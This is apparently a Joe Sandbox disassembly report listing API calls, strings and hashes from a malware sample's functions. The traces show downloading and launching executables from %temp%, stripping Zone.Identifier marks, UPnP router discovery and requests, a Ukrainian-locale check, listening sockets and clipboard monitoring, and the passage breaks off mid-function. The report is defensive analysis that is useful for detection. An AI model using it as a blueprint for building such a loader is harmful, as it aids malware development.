htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A

Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
htons.WS2_32(0000076C), ref: 0040D760
inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D

Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

239.255.255.250, xrefs: 0040D76A

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A

Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CD02
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
GetTickCount.KERNEL32 ref: 0040CD74
Sleep.KERNEL32(00000001), ref: 0040CD94
GetTickCount.KERNEL32 ref: 0040CD9A

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95

Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040AAAD

Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

Strings

www.update.microsoft.com, xrefs: 0040AAB7

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA

Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 0040F162

Strings

oA, xrefs: 0040F263
oA, xrefs: 0040F181
oA, xrefs: 0040F2C0

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: oA$ oA$ oA
API String ID: 2850889275-3725432611
Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C

Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5

Strings

Bz@, xrefs: 0040BE8F, 0040BEA5, 0040BEB1, 0040BE92, 0040BEA8, 0040BEB4

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Bz@
API String ID: 1815803762-793989200
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A

Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
strcmp.NTDLL ref: 0040E752

Strings

UKR, xrefs: 0040E749

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040EAE9
srand.MSVCRT ref: 0040EAF0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
strlen.NTDLL ref: 0040EB1A
mbstowcs.NTDLL ref: 0040EB31
rand.MSVCRT ref: 0040EB39
rand.MSVCRT ref: 0040EB4D
wsprintfW.USER32 ref: 0040EB74
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
wsprintfW.USER32 ref: 0040EC74
DeleteFileW.KERNEL32(?), ref: 0040EC84
Sleep.KERNEL32(000007D0), ref: 0040ECA5
ExitProcess.KERNEL32 ref: 0040ECCD
DeleteFileW.KERNEL32(?), ref: 0040ECE3
CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
InternetCloseHandle.WININET(00000000), ref: 0040ECFD
InternetCloseHandle.WININET(00000000), ref: 0040ED0A
Sleep.KERNEL32(000003E8), ref: 0040ED15
rand.MSVCRT ref: 0040ED2A
Sleep.KERNEL32 ref: 0040ED3B
rand.MSVCRT ref: 0040ED41
rand.MSVCRT ref: 0040ED55
wsprintfW.USER32 ref: 0040ED7C
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
wsprintfW.USER32 ref: 0040EDB9
DeleteFileW.KERNEL32(?), ref: 0040EDC9
Sleep.KERNEL32(000007D0), ref: 0040EDEA
ExitProcess.KERNEL32 ref: 0040EE11
DeleteFileW.KERNEL32(?), ref: 0040EE20

Strings

%s:Zone.Identifier, xrefs: 0040EDAD
]u@, xrefs: 0040EE06, 0040ECC2
%s\%d%d.exe, xrefs: 0040ED70
%s\%d%d.exe, xrefs: 0040EB68
%temp%, xrefs: 0040EB0B
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EB85
.ou, xrefs: 0040EC5B, 0040ECF0
%s:Zone.Identifier, xrefs: 0040EC68

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
API String ID: 3709769524-481826255
Opcode ID: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
Opcode Fuzzy Hash: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE

strcmp.NTDLL ref: 0040AED0

Strings

127., xrefs: 0040AEE1
192., xrefs: 0040AF40
10., xrefs: 0040AF9F
.10., xrefs: 0040AFDB
.192, xrefs: 0040AF5E
.127., xrefs: 0040AF1D
.192., xrefs: 0040AF7C
.10, xrefs: 0040AFBD
.127, xrefs: 0040AEFF
0.0.0.0, xrefs: 0040AEBE

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E518
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
InternetCloseHandle.WININET(00000000), ref: 0040E701
InternetCloseHandle.WININET(00000000), ref: 0040E70E
InternetCloseHandle.WININET(00000000), ref: 0040E71B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E576
POST, xrefs: 0040E5DE
<, xrefs: 0040E520

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
PCOI, xrefs: 0040160D
.ou, xrefs: 004016FF

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci$.ou
API String ID: 2403999931-3537421359
Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040597C
SetClipboardViewer.USER32(?), ref: 004059C8
SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
